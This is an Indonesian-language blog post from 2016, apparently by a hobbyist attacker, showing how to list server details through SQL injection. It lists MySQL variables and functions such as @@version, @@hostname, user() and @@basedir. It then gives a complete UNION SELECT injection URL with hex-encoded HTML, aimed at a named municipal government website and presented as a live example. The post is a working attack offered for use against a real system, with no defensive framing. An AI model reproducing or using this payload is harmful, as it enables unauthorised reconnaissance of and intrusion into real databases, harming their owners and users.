Monday, May 30, 2016

Multiple Variable dan Function di Sql Injection

0 comment
hari ini ane mau bahas dan share sedikit tentang kode kode untuk menampilkan variable dan function sql injection

 contoh seperti gambar dibawah ini dan bagi ini fungsi dari kode kode ini untuk menampilkan beberapa info dalam web target



  • @@port                                                    : Check Ports
  • @@version_compile_os                            : Check which Operationg system is running
  • @@CHARACTER_SET_FILESYSTEM : Tell File system :
  • @@version_compile_machine                   : Check 32 bit/64 bit
  • @@hostname                                           : Current Hostname
  • @@tmpdir                                               : Tept Directory
  • @@datadir                                              : Data Directory
  • @@version                                              : Version of DB
  • @@basedir                                              : Base Directory
  • user()                                                        : Current User
  • database()                                                : Current Database
  • version()                                                   : Version
  • schema()                                                   : current Database
  • UUID()                                                     : System UUID key
  • current_user()                                            : Current User
  • current_user                                               : Current User
  • system_user()                                             : Current Sustem user
  • session_user()                                             : Session user
  • @@GLOBAL.have_symlink                       : Check if Symlink Enabled or Disabled
  • @@GLOBAL.have_ssl                              : Check if it have ssl or not 

Cara Menampilkannya pakai

concat(@@version,0x3a,database()) < contoh doang :D


http://www.palembang.go.id/v1/detail/149 and false union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x3c62723e,0x48756d616e2045646f2054656e7365693c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e64617461626173653d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e76657273696f6e3d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e757365723d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e506f72743d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@port,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4f533d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@version_compile_os,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e424954532044455441494c533d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,@@version_compile_machine,0x3c666f6e7420636f6c6f723d677265656e3e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e46494c452053595354454d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@CHARACTER_SET_FILESYSTEM,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x686f73746e616d653d3d,@@hostname,0x3c62723e,0x53797374656d2075756964206b65793d3d,UUID(),0x3c62723e,0x73796d6c696e6b3d3d,@@GLOBAL.have_symlink,0x3c62723e,0x53534c3d3d,@@GLOBAL.have_ssl,0x3c62723e,0x426173656469726563746f72793d3d,@@basedir),5,6,7--/pemkot-palembang-budayakan-masyarakat-gemar-membaca-al-quran'

live contohnya :D

sekian tutorial dari saya semoga bermanfaat

#HumanEdoTensei
You Might Also Like
No comments

Post a Comment

Whatsapp Button works on Mobile Device only

Start typing and press Enter to search